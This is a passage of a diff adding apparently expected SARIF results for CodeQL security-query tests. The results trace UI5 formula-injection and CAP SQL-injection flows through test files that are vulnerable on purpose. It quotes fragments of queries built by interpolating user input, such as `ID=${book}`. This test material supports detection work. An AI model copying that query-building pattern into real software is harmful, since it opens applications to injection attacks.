"%SRCROOT%", + "index" : 145 + }, + "region" : { + "startLine" : 17, + "startColumn" : 27, + "endColumn" : 45 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-formula-injection", + "rule" : { + "id" : "js/ui5-formula-injection", + "index" : 4, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The content of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 23, + "startColumn" : 27, + "endColumn" : 39 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "9afa5fd07ee36af6:1", + "primaryLocationStartColumnFingerprint" : "10" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 155 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 9, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 15, + "startColumn" : 29, + "endColumn" : 47 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 15, + "startColumn" : 21, + "endColumn" : 47 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 17, + "startColumn" : 53, + "endColumn" : 58 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 17, + "startColumn" : 46, + "endColumn" : 59 + } + }, + "message" : { + "text" : "String(value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 17, + "startColumn" : 36, + "endColumn" : 60 + } + }, + "message" : { + "text" : "encodeX ... value))" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 17, + "startColumn" : 21, + "endColumn" : 60 + } + }, + "message" : { + "text" : "xssSanitized" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + }, + "region" : { + "startLine" : 23, + "startColumn" : 27, + "endColumn" : 39 + } + }, + "message" : { + "text" : "xssSanitized" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-formula-injection", + "rule" : { + "id" : 
"js/ui5-formula-injection", + "index" : 4, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The content of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + }, + "region" : { + "startLine" : 16, + "startColumn" : 23, + "endColumn" : 51 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e701acdf85af03b4:1", + "primaryLocationStartColumnFingerprint" : "10" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + }, + "region" : { + "startLine" : 16, + "startColumn" : 23, + "endColumn" : 51 + } + }, + "message" : { + "text" : "oModel. ... 
input')" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 13, + "startColumn" : 36, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e5ae8639cd6967fb:1", + "primaryLocationStartColumnFingerprint" : "29" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : 
"%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 12, + "startColumn" : 50, + "endColumn" : 54 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 12, + "startColumn" : 44, + "endColumn" : 56 + } + }, + "message" : { + "text" : "`ID=${book}`" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" 
: "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 12, + "startColumn" : 19, + "endColumn" : 57 + } + }, + "message" : { + "text" : "SELECT. ... book}`)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 12, + "startColumn" : 11, + "endColumn" : 57 + } + }, + "message" : { + "text" : "query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 13, + "startColumn" : 36, + "endColumn" : 41 + } + }, + "message" : { + "text" : "query" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 15, + "startColumn" : 27, + "endColumn" : 65 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "b41554298e90b620:1", + "primaryLocationStartColumnFingerprint" : "20" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", 
+ "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 15, + "startColumn" : 58, + "endColumn" : 62 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 15, + "startColumn" : 52, + "endColumn" : 64 + } + }, + "message" : { + "text" : "`ID=${book}`" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 15, + "startColumn" : 27, + "endColumn" : 65 + } + }, + "message" : { + "text" : "SELECT. ... 
book}`)" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 18, + "startColumn" : 37, + "endColumn" : 43 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "967d7be3edc97a9e:1", + "primaryLocationStartColumnFingerprint" : "30" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 
8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 17, + "startColumn" : 53, + "endColumn" : 57 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 17, + "startColumn" : 45, + "endColumn" : 57 + } + }, + "message" : { + "text" : "'ID=' + book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" 
: 17, + "startColumn" : 20, + "endColumn" : 58 + } + }, + "message" : { + "text" : "SELECT. ... + book)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 17, + "startColumn" : 11, + "endColumn" : 58 + } + }, + "message" : { + "text" : "query2" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 18, + "startColumn" : 37, + "endColumn" : 43 + } + }, + "message" : { + "text" : "query2" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 20, + "startColumn" : 27, + "endColumn" : 65 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "1c132adaa6986472:1", + "primaryLocationStartColumnFingerprint" : "20" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", 
+ "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 20, + "startColumn" : 60, + "endColumn" : 64 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 20, + "startColumn" : 52, + "endColumn" : 64 + } + }, + "message" : { + "text" : "'ID=' + book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 20, + "startColumn" : 27, + "endColumn" : 65 + } + }, + "message" : { + "text" : "SELECT. ... 
+ book)" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 28, + "startColumn" : 39, + "endColumn" : 42 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "144d55d233768c80:1", + "primaryLocationStartColumnFingerprint" : "32" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 
8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 27, + "startColumn" : 59, + "endColumn" : 63 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 27, + "startColumn" : 17, + "endColumn" : 63 + } + }, + "message" : { + "text" : "CQL`SEL ... 
